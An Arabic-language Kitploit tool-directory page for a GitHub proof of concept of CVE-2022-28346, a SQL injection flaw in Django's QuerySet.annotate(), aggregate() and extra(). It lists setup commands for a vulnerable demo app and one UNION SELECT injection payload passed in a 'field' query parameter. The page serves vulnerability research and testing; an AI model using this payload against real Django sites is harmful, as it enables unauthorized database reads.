Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-28346 — تم اكتشاف مشكلة في Django 2.2 قبل 2.2.28، و3.2 قبل 3.2.13، و4.0 قبل 4.0.4. طرق QuerySet.annotate() وaggregate() وextra() معرّضة لحقن SQL في الأسماء المستعارة للأعمدة عبر قاموس مُصمَّم خصيصًا (مع توسيع القاموس) يُمرَّر كوسائط **kwargs. | Kitploit
أدوات/GitHubGitHub/vincentinttsh/cve-2022-28346
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبأمن قواعد البيانات
GitHubvincentinttsh/cve-2022-28346

CVE-2022-28346

تم اكتشاف مشكلة في Django 2.2 قبل 2.2.28، و3.2 قبل 3.2.13، و4.0 قبل 4.0.4. طرق QuerySet.annotate() وaggregate() وextra() معرّضة لحقن SQL في الأسماء المستعارة للأعمدة عبر قاموس مُصمَّم خصيصًا (مع توسيع القاموس) يُمرَّر كوسائط **kwargs.

عرض المستودع
منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-28346 PoC Tweet

التأثير:

  • إمكانية حقن SQL في QuerySet.annotate() وaggregate() وextra().

التثبيت

root@kitploit:~
poetry install
python manage.py makemigrations
python manage.py migrate
python manage.py loaddata data.json
python manage.py runserver

PoC

root@kitploit:~
?field=poc.title" FROM "poc_blog" union SELECT "-1,",sqlite_version(),"3" --

poc-image

المراجع

CVE Mitre

Django

تنزيل الأداة